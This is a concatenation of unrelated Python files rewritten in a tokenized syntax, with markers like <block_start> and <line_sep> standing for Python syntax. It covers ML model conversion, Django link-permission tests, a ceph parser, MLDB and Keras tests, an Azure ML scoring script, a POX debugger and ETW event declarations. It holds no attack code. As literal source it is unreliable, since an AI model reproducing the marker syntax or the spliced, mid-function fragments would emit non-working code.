<block_start><if_stmt>args.tflite<block_start><import_from_stmt>convert.convert_to_tflite convert_localization<line_sep>frozen_model=".tmp/tflite_frozen_model.pb"<line_sep>graph=strip_and_freeze_model(saved_model=args.saved_model output_path=frozen_model input_node_names=["Preprocessor/sub"] output_node_names=["Squeeze" "Postprocessor/convert_scores"] )<line_sep>anchors=get_anchors(graph)<line_sep>convert_localization(frozen_model=frozen_model labels_path=labels_path output_path=args.tflite_path anchors=anchors )<block_end><block_end>@attempt_conversion("object detection" "TensorFlow.js")<def_stmt>convert_object_detection_tfjs <block_start><if_stmt>args.tfjs<block_start><import_from_stmt>convert.convert_to_tfjs convert_localization<line_sep>frozen_model=".tmp/tfjs_frozen_model.pb"<line_sep>strip_and_freeze_model(saved_model=args.saved_model output_path=frozen_model input_node_names=[] output_node_names=["Postprocessor/ExpandDims_1" "Postprocessor/Slice"] )<line_sep>convert_localization(frozen_model=frozen_model labels_path=labels_path output_path=args.tfjs_path )<block_end><block_end><block_end>################################################################################ # Classification ################################################################################ <if_stmt>args.model_type<eq>"classification"<block_start>labels_path=os.path.join(args.saved_model "labels.txt")<line_sep>@attempt_conversion("classification" "Core ML")<def_stmt>convert_classification_coreml <block_start><if_stmt>args.coreml<block_start><import_from_stmt>convert.convert_to_core_ml convert_classification<line_sep>frozen_model=".tmp/coreml_frozen_model.pb"<line_sep>strip_and_freeze_model(saved_model=args.saved_model output_path=frozen_model input_node_names=["Placeholder"] output_node_names=["final_result"] )<line_sep>convert_classification(frozen_model=frozen_model labels_path=labels_path output_path=args.mlmodel_path )<block_end><block_end>@attempt_conversion("classification" "TensorFlow Lite")<def_stmt>convert_classification_tflite <block_start><if_stmt>args.tflite<block_start><import_from_stmt>convert.convert_to_tflite convert_classification<line_sep>frozen_model=".tmp/tflite_frozen_model.pb"<line_sep>strip_and_freeze_model(saved_model=args.saved_model output_path=frozen_model input_node_names=["Placeholder"] output_node_names=["final_result"] )<line_sep>convert_classification(frozen_model=frozen_model labels_path=labels_path output_path=args.tflite_path )<block_end><block_end>@attempt_conversion("classification" "TensorFlow.js")<def_stmt>convert_classification_tfjs <block_start><if_stmt>args.tfjs<block_start><import_from_stmt>convert.convert_to_tfjs convert_classification<line_sep>frozen_model=".tmp/tfjs_frozen_model.pb"<line_sep>strip_and_freeze_model(saved_model=args.saved_model output_path=frozen_model input_node_names=["Placeholder"] output_node_names=["final_result"] )<line_sep>convert_classification(frozen_model=frozen_model labels_path=labels_path output_path=args.tfjs_path )<block_end><block_end><block_end>
<import_from_stmt>django.urls reverse<import_from_stmt>..links.document_file_links link_document_file_delete link_document_file_download_quick <import_from_stmt>..links.favorite_links link_document_favorites_add link_document_favorites_remove <import_from_stmt>..links.trashed_document_links link_document_restore<import_from_stmt>..models TrashedDocument<import_from_stmt>..permissions permission_document_file_delete permission_document_file_download permission_document_view permission_trashed_document_restore <import_from_stmt>.base GenericDocumentViewTestCase<import_from_stmt>.mixins.favorite_document_mixins FavoriteDocumentTestMixin<class_stmt>FavoriteDocumentLinkTestCase(FavoriteDocumentTestMixin GenericDocumentViewTestCase)<block_start><def_stmt>test_favorite_document_add_link_no_permission self<block_start>self._create_test_document_stub()<line_sep>self.add_test_view(test_object=self.test_document)<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_favorites_add.resolve(context=context)<line_sep>self.assertEqual(resolved_link <none>)<block_end><def_stmt>test_favorite_document_add_link_with_access self<block_start>self._create_test_document_stub()<line_sep>self.grant_access(obj=self.test_document_stub permission=permission_document_view)<line_sep>self.add_test_view(test_object=self.test_document)<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_favorites_add.resolve(context=context)<line_sep>self.assertNotEqual(resolved_link <none>)<block_end><def_stmt>test_favorite_document_add_link_external_user_with_access self<block_start>self._create_test_user()<line_sep>self._create_test_document_stub()<line_sep>self.grant_access(obj=self.test_document_stub permission=permission_document_view)<line_sep>self._test_document_favorite_add(user=self.test_user)<line_sep>self.add_test_view(test_object=self.test_document)<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_favorites_add.resolve(context=context)<line_sep>self.assertNotEqual(resolved_link <none>)<block_end><def_stmt>test_favorite_document_remove_link_no_permission self<block_start>self._create_test_document_stub()<line_sep>self._test_document_favorite_add()<line_sep>self.add_test_view(test_object=self.test_document)<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_favorites_remove.resolve(context=context)<line_sep>self.assertEqual(resolved_link <none>)<block_end><def_stmt>test_favorite_document_remove_link_with_access self<block_start>self._create_test_document_stub()<line_sep>self.grant_access(obj=self.test_document_stub permission=permission_document_view)<line_sep>self._test_document_favorite_add()<line_sep>self.add_test_view(test_object=self.test_document)<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_favorites_remove.resolve(context=context)<line_sep>self.assertNotEqual(resolved_link <none>)<block_end><def_stmt>test_favorite_document_remove_link_external_user_with_access self<block_start>self._create_test_user()<line_sep>self._create_test_document_stub()<line_sep>self.grant_access(obj=self.test_document_stub permission=permission_document_view)<line_sep>self._test_document_favorite_add(user=self.test_user)<line_sep>self.add_test_view(test_object=self.test_document)<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_favorites_remove.resolve(context=context)<line_sep>self.assertEqual(resolved_link <none>)<block_end><block_end><class_stmt>DocumentsLinksTestCase(GenericDocumentViewTestCase)<block_start><def_stmt>test_document_file_delete_link_no_permission self<block_start>self._upload_test_document_file()<line_sep>self.assertTrue(self.test_document.files.count() 2)<line_sep>self.add_test_view(test_object=self.test_document.files.first())<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_file_delete.resolve(context=context)<line_sep>self.assertEqual(resolved_link <none>)<block_end><def_stmt>test_document_file_delete_link_with_permission self<block_start>self._upload_test_document_file()<line_sep>self.assertTrue(self.test_document.files.count() 2)<line_sep>self.grant_access(obj=self.test_document permission=permission_document_file_delete)<line_sep>self.add_test_view(test_object=self.test_document.files.first())<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_file_delete.resolve(context=context)<line_sep>self.assertNotEqual(resolved_link <none>)<line_sep>self.assertEqual(resolved_link.url reverse(viewname=link_document_file_delete.view args=(self.test_document.files.first().pk )))<block_end><def_stmt>test_document_file_download_link_no_permission self<block_start>self.add_test_view(test_object=self.test_document.file_latest)<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_file_download_quick.resolve(context=context)<line_sep>self.assertEqual(resolved_link <none>)<block_end><def_stmt>test_document_file_download_link_with_permission self<block_start>self.grant_access(obj=self.test_document permission=permission_document_file_download)<line_sep>self.add_test_view(test_object=self.test_document.file_latest)<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_file_download_quick.resolve(context=context)<line_sep>self.assertNotEqual(resolved_link <none>)<line_sep>self.assertEqual(resolved_link.url reverse(viewname=link_document_file_download_quick.view args=(self.test_document.file_latest.pk )))<block_end><block_end><class_stmt>TrashedDocumentsLinksTestCase(GenericDocumentViewTestCase)<block_start><def_stmt>setUp self<block_start>super().setUp()<line_sep>self.test_document.delete()<line_sep>self.test_trashed_document=TrashedDocument.objects.get(pk=self.test_document.pk)<line_sep>self.add_test_view(test_object=self.test_trashed_document)<line_sep>self.context=self.get_test_view()<block_end><def_stmt>test_trashed_document_restore_link_no_permission self<block_start>resolved_link=link_document_restore.resolve(context=self.context)<line_sep>self.assertEqual(resolved_link <none>)<block_end><def_stmt>test_trashed_document_restore_link_with_permission self<block_start>self.grant_access(obj=self.test_document permission=permission_trashed_document_restore)<line_sep>resolved_link=link_document_restore.resolve(context=self.context)<line_sep>self.assertNotEqual(resolved_link <none>)<line_sep>self.assertEqual(resolved_link.url reverse(viewname=link_document_restore.view args=(self.test_trashed_document.pk )))<block_end><block_end>
""" ceph_insights - command ``ceph insights`` ========================================= """<import_stmt>json<import_stmt>re<import_from_stmt>.. CommandParser parser<import_from_stmt>insights.specs Specs<line_sep>@parser(Specs.ceph_insights)<class_stmt>CephInsights(CommandParser)<block_start>""" Parse the output of the ``ceph insights`` command. Attributes: version (dict): version information of the Ceph cluster. data (dict): a dictionary of the parsed output. The ``data`` attribute is a dictionary containing the parsed output of the ``ceph insights`` command. The following are available in ``data``: * ``crashes`` - summary of daemon crashes for the past 24 hours * ``health`` - the current and historical (past 24 hours) health checks * ``config`` - cluster and daemon configuration settings * ``osd_dump`` - osd and pool information * ``df`` - storage usage statistics * ``osd_tree`` - osd topology * ``fs_map`` - file system map * ``crush_map`` - the CRUSH map * ``mon_map`` - monitor map * ``service_map`` - service map * ``manager_map`` - manager map * ``mon_status`` - monitor status * ``pg_summary`` - placement group summary * ``osd_metadata`` - per-OSD metadata * ``version`` - ceph software version * ``errors`` - any errors encountered collecting this data The ``version`` attribute contains a normalized view of ``self.data["version"]``. Examples: >>> ceph_insights.version["release"] == 14 True >>> ceph_insights.version["major"] == 0 True >>> ceph_insights.version["minor"] == 0 True >>> isinstance(ceph_insights.data["crashes"], dict) True >>> isinstance(ceph_insights.data["health"], dict) True """<line_sep>IGNORE_RE=["\*\*\* DEVELOPER MODE" "\d+-\d+-\d+.+WARNING: all dangerous"]<line_sep>bad_lines=["module 'insights' is not enabled" "no valid command found"]<def_stmt>__init__ self *args **kwargs<block_start>kwargs.update(dict(extra_bad_lines=self.bad_lines))<line_sep>super(CephInsights self).__init__(*args **kwargs)<block_end><def_stmt>_sanitize_content self content<block_start>"""Remove lines matching IGNORE_RE at start of content"""<line_sep>slice_point=0<line_sep>ignore_re=re.compile('|'.join(CephInsights.IGNORE_RE))<for_stmt>line content<block_start><if_stmt><not>line<or>ignore_re.match(line)<block_start>slice_point<augadd>1<line_sep><continue><block_end><break><block_end><return>content[slice_point:]<block_end><def_stmt>_parse_version self<block_start>""" Add a Ceph version property as a dictionary with the keys "release", "major", "minor" containing numeric values, and the key "full" with the full version string. If Ceph is not compiled with verison information (this should never be the case in a production system), then "release", "major", and "minor" are set to None. """<line_sep>self.version={"release":<none> "major":<none> "minor":<none>}<line_sep>self.version.update(self.data["version"])<block_end><def_stmt>parse_content self content<block_start>content=self._sanitize_content(content)<line_sep>self.data=json.loads(''.join(content))<line_sep>self._parse_version()<block_end><block_end>
# # Copyright (C) 2018 Pico Technology Ltd. See LICENSE file for terms. #
# # MLDB-1104-input-data-spec.py # mldb.ai inc, 2015 # This file is part of MLDB. Copyright 2015 mldb.ai inc. All rights reserved. # <import_stmt>unittest<import_stmt>datetime<import_stmt>random<import_from_stmt>mldb mldb ResponseException<class_stmt>InputDataSpecTest(unittest.TestCase)<block_start>@classmethod<def_stmt>setUpClass cls<block_start>cls.load_kmeans_dataset()<line_sep>cls.load_classifier_dataset()<block_end>@classmethod<def_stmt>load_kmeans_dataset cls<block_start>kmeans_example=mldb.create_dataset({"type":"sparse.mutable" 'id':'kmeans_example'})<line_sep>now=datetime.datetime.now()<for_stmt>i range(100)<block_start>val_x=float(random.randint(-5 5))<line_sep>val_y=float(random.randint(-5 5))<line_sep>row=[['x' val_x now] ['y' val_y now]]<line_sep>kmeans_example.record_row('row_%d'%i row)<block_end>kmeans_example.commit()<block_end><def_stmt>train_kmeans self training_data<block_start>metric="euclidean"<line_sep>mldb.put("/v1/procedures/kmeans" {'type':'kmeans.train' 'params':{'trainingData':training_data 'centroidsDataset':{'id':'kmeans_centroids' 'type':'embedding' 'params':{'metric':metric}} 'numClusters':2 'metric':metric}})<block_end><def_stmt>train_svd self training_data<block_start>mldb.put("/v1/procedures/svd" {'type':'svd.train' 'params':{'trainingData':training_data 'runOnCreation':<true>}})<block_end>@classmethod<def_stmt>load_classifier_dataset cls<block_start>dataset=mldb.create_dataset({"type":"sparse.mutable" "id":"iris_dataset"})<with_stmt>open("./mldb/testing/dataset/iris.data")<as>f<block_start><for_stmt>i,line enumerate(f)<block_start>cols=[]<line_sep>line_split=line.split(',')<if_stmt>len(line_split)<ne>5<block_start><continue><block_end># Jemery's what if a feature is named label cols.append(["label" float(line_split[0]) 0])# sepal length cols.append(["labels" float(line_split[1]) 0])# sepal width cols.append(["petal length" float(line_split[2]) 0])<line_sep>cols.append(["petal width" float(line_split[3]) 0])<line_sep>cols.append(["features" line_split[4].strip('\n"') 0])#class dataset.record_row(str(i+1) cols)<block_end><block_end>dataset.commit()<block_end><def_stmt>train_classifier self training_data<block_start>result=mldb.put("/v1/procedures/classifier" {'type':'classifier.train' 'params':{'trainingData':training_data "configuration":{"type":"decision_tree" "max_depth":8 "verbosity":3 "update_alg":"prob"} "modelFileUrl":"file://tmp/MLDB-1104.cls" "mode":"categorical" "functionName":"classifier_apply" 'runOnCreation':<true>}})<line_sep><return>result.json()<block_end><def_stmt>test_train_kmeans self# KMEANS TRAIN PROCEDURE WITH BOTH TYPE OF INPUT DATA <block_start>self.train_kmeans('select * from kmeans_example')<line_sep>self.train_kmeans('select x + y as x, y + x as y from kmeans_example')<line_sep>self.train_kmeans({'select':'*' 'from':{'id':'kmeans_example'}})<line_sep># TEST ERROR CASE <with_stmt>self.assertRaises(ResponseException)<block_start>self.train_kmeans('select x, y from kmeans_example group by x')<block_end><with_stmt>self.assertRaises(ResponseException)<block_start>self.train_kmeans('select x, y from kmeans_example group by x having y > 2')<block_end><block_end><def_stmt>test_train_svd self<block_start>self.train_svd('select * from kmeans_example')<line_sep>self.train_svd('select x, y from kmeans_example')<line_sep>self.train_svd('select x AS z, y from kmeans_example')<line_sep>self.train_svd('select * EXCLUDING(x) from kmeans_example')<line_sep>self.train_svd({'select':'*' 'from':{'id':'kmeans_example'}})<line_sep>self.train_svd('select x + 1, y from kmeans_example')<with_stmt>self.assertRaises(ResponseException)<block_start>self.train_svd('select x, y from kmeans_example group by x')<block_end><with_stmt>self.assertRaises(ResponseException)<block_start>self.train_svd('select x, y from kmeans_example group by x having y > 2')<block_end><block_end><def_stmt>test_train_classifier self<block_start>mldb.log(self.train_classifier("select {label, labels} as features, features as label "<concat>"from iris_dataset"))<line_sep>result=mldb.get("/v1/query" q="SELECT classifier_apply({{label, labels} as features}) as *, features from iris_dataset")<line_sep>rows=result.json()<line_sep>mldb.log("-------------------------------")<line_sep>mldb.log(rows)<line_sep># compare the classifier results on the train data with the original # label count=0<for_stmt>row rows<block_start>_max=0<line_sep>category=""<for_stmt>column row['columns'][1:4]<block_start><if_stmt>column[1]<g>_max<block_start>_max=column[1]<line_sep># remove the leading scores. and quotation marks category=column[0][10:-3]<block_end><block_end><if_stmt>category<ne>row['columns'][0][1]<block_start>count<augadd>1<block_end><block_end># misclassified result should be a small fraction self.assertTrue(float(count)/len(rows)<l>0.2 'the classifier results on the train data are strangely low')<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>mldb.run_tests()<block_end>
# pylint: disable=no-self-use,invalid-name <import_stmt>numpy<import_from_stmt>numpy.testing assert_almost_equal<import_stmt>keras.backend<as>K<import_from_stmt>deep_qa.tensors.similarity_functions.dot_product DotProduct<class_stmt>TestDotProductSimilarityFunction<block_start>dot_product=DotProduct(name='dot_product')<def_stmt>test_initialize_weights_returns_empty self<block_start>weights=self.dot_product.initialize_weights(3 3)<assert_stmt>isinstance(weights list)<and>len(weights)<eq>0<block_end><def_stmt>test_compute_similarity_does_a_dot_product self<block_start>a_vectors=numpy.asarray([[1 1 1] [-1 -1 -1]])<line_sep>b_vectors=numpy.asarray([[1 0 1] [1 0 0]])<line_sep>result=K.eval(self.dot_product.compute_similarity(K.variable(a_vectors) K.variable(b_vectors)))<assert_stmt>result.shape<eq>(2 )<assert_stmt>numpy.all(result<eq>[2 -1])<block_end><def_stmt>test_compute_similarity_works_with_higher_order_tensors self<block_start>a_vectors=numpy.random.rand(5 4 3 6 7)<line_sep>b_vectors=numpy.random.rand(5 4 3 6 7)<line_sep>result=K.eval(self.dot_product.compute_similarity(K.variable(a_vectors) K.variable(b_vectors)))<assert_stmt>result.shape<eq>(5 4 3 6)<line_sep>assert_almost_equal(result[3 2 1 3] numpy.dot(a_vectors[3 2 1 3] b_vectors[3 2 1 3]) decimal=6)<block_end><block_end>
""" Common constants for Pipeline. """<line_sep>AD_FIELD_NAME='asof_date'<line_sep>ANNOUNCEMENT_FIELD_NAME='announcement_date'<line_sep>CASH_FIELD_NAME='cash'<line_sep>CASH_AMOUNT_FIELD_NAME='cash_amount'<line_sep>BUYBACK_ANNOUNCEMENT_FIELD_NAME='buyback_date'<line_sep>DAYS_SINCE_PREV='days_since_prev'<line_sep>DAYS_SINCE_PREV_DIVIDEND_ANNOUNCEMENT='days_since_prev_dividend_announcement'<line_sep>DAYS_SINCE_PREV_EX_DATE='days_since_prev_ex_date'<line_sep>DAYS_TO_NEXT='days_to_next'<line_sep>DAYS_TO_NEXT_EX_DATE='days_to_next_ex_date'<line_sep>EX_DATE_FIELD_NAME='ex_date'<line_sep>NEXT_AMOUNT='next_amount'<line_sep>NEXT_ANNOUNCEMENT='next_announcement'<line_sep>NEXT_EX_DATE='next_ex_date'<line_sep>NEXT_PAY_DATE='next_pay_date'<line_sep>PAY_DATE_FIELD_NAME='pay_date'<line_sep>PREVIOUS_AMOUNT='previous_amount'<line_sep>PREVIOUS_ANNOUNCEMENT='previous_announcement'<line_sep>PREVIOUS_BUYBACK_ANNOUNCEMENT='previous_buyback_announcement'<line_sep>PREVIOUS_BUYBACK_CASH='previous_buyback_cash'<line_sep>PREVIOUS_BUYBACK_SHARE_COUNT='previous_buyback_share_count'<line_sep>PREVIOUS_EX_DATE='previous_ex_date'<line_sep>PREVIOUS_PAY_DATE='previous_pay_date'<line_sep>SHARE_COUNT_FIELD_NAME='share_count'<line_sep>SID_FIELD_NAME='sid'<line_sep>TS_FIELD_NAME='timestamp'<line_sep>
<import_stmt>os<import_stmt>json<import_stmt>time<import_stmt>torch<line_sep># Called when the deployed service starts <def_stmt>init <block_start><global>model<line_sep><global>device<line_sep># Get the path where the deployed model can be found. model_filename='obj_segmentation.pkl'<line_sep>model_path=os.path.join(os.environ['AZUREML_MODEL_DIR'] model_filename)<line_sep>device=torch.device('cuda')<if>torch.cuda.is_available()<else>torch.device('cpu')<line_sep>model=torch.load(model_path map_location=device)<block_end># Handle requests to the service <def_stmt>run data<block_start><try_stmt><block_start>start_at=time.time()<line_sep>inputs=json.loads(data)<line_sep>img_data_list=inputs["instances"]<line_sep>img_tensor_list=[torch.tensor(item)<for>item img_data_list]<line_sep>model.eval()<with_stmt>torch.no_grad()<block_start>predictions=model([item.to(device)<for>item img_tensor_list])<block_end>pred_data_list=[{"masks":prediction['masks'][0 0].mul(255).byte().cpu().numpy().tolist() "boxes":prediction['boxes'].numpy().tolist() "labels":prediction['labels'].numpy().tolist() "scores":prediction['scores'].numpy().tolist() }<for>prediction predictions]<line_sep><return>{"predictions":pred_data_list "elapsed_time":time.time()-start_at}<block_end><except_stmt>Exception<as>e<block_start>error=str(e)<line_sep><return>error<block_end><block_end>
# Copyright 2012 <NAME> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at: # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Primitive help for debugging deadlocks. Prints stack info for all threads. (Might be more useful if it only printed stack frames that were not changing, sort of like recoco_spy.) This was initially factored out from a pox.py modification by <NAME>. """<import_stmt>sys<import_stmt>time<import_stmt>inspect<import_stmt>traceback<import_stmt>threading<import_from_stmt>pox.core core<import_stmt>os<line_sep>base_path=__file__<line_sep>base_path=os.path.split(base_path)[0]<line_sep>base_path=os.path.split(base_path)[0]<line_sep>base_path<augadd>os.path.sep<def_stmt>fmt_tb tb<block_start>f=tb.filename<if_stmt>f.startswith(base_path)<block_start>f=f[len(base_path):]<block_end>l="%s:%i"%(f tb.lineno)<line_sep>code=tb.code_context<if_stmt>code<block_start>code=code[0].strip()<block_end><if_stmt><not>code<block_start>code="<Unknown>"<block_end><return>"%20s: %s"%(l code)<block_end><def_stmt>_trace_thread_proc <block_start><try_stmt><block_start><while_stmt>core.running<block_start>frames=sys._current_frames()<for_stmt>key frames<block_start>frame=frames[key]<line_sep>print(fmt_tb(inspect.getframeinfo(frame)))<line_sep>outer_frames=inspect.getouterframes(frame)<for_stmt>i range(0 len(outer_frames))<block_start>print(" "+fmt_tb(inspect.getframeinfo(outer_frames[i][0])))<block_end><block_end>time.sleep(5)<block_end><block_end><except_stmt><block_start>traceback.print_exc()<block_end><block_end><def_stmt>launch <block_start>_trace_thread=threading.Thread(target=_trace_thread_proc)<line_sep>_trace_thread.daemon=<true><line_sep># Start it up a bit in the future so that it doesn't print all over # init messages. core.callDelayed(3 _trace_thread.start)<block_end>
<import_from_stmt>apps.flow.settings config<if_stmt>config.SERVER_ENV<ne>'dev'<block_start><import_from_stmt>gevent monkey<line_sep>monkey.patch_all()<block_end><else_stmt><block_start><pass><block_end><import_from_stmt>apps.flow.views.deploy deploy<import_from_stmt>apps.flow.views.flow flow<import_from_stmt>library.api.tFlask tflask<def_stmt>create_app <block_start>app=tflask(config)<line_sep>register_blueprints(app)<line_sep><return>app<block_end><def_stmt>register_blueprints app<block_start>app.register_blueprint(flow url_prefix="/v1/flow")<line_sep>app.register_blueprint(deploy url_prefix="/v1/deploy")<block_end><if_stmt>__name__<eq>'__main__'<block_start>create_app().run(port=config.PORT)<block_end>
# -*- coding: utf-8 -*- """ Microsoft-Windows-SecurityMitigationsBroker GUID : ea8cd8a5-78ff-4418-b292-aadc6a7181df """<import_from_stmt>construct Int8sl Int8ul Int16ul Int16sl Int32sl Int32ul Int64sl Int64ul Bytes Double Float32l Struct<import_from_stmt>etl.utils WString CString SystemTime Guid<import_from_stmt>etl.dtyp Sid<import_from_stmt>etl.parsers.etw.core Etw declare guid<line_sep>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1003 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1003_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1004 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1004_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1005 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1005_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1006 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1006_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ACGState"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1007 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1007_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1008 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1008_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1009 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1009_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul "ACGState"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1010 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1010_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1011 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1011_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1012 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1012_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1013 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1013_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1014 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1014_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1015 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1015_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1016 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1016_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1017 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1017_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1018 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1018_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1019 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1019_0(Etw)<block_start>pattern=Struct("DriverId1"/Int64ul "DriverId2"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1020 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1020_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1021 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1021_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1022 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1022_0(Etw)<block_start>pattern=Struct("Description"/WString "VendorId"/Int32ul "DeviceId"/Int32ul "DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1023 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1023_0(Etw)<block_start>pattern=Struct("Description"/WString "VendorId"/Int32ul "DeviceId"/Int32ul "DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1024 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1024_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1025 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1025_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1026 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1026_0(Etw)<block_start>pattern=Struct("Description"/WString "VendorId"/Int32ul "DeviceId"/Int32ul "DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1027 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1027_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1030 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1030_0(Etw)<block_start>pattern=Struct("ModuleName"/WString)<block_end>
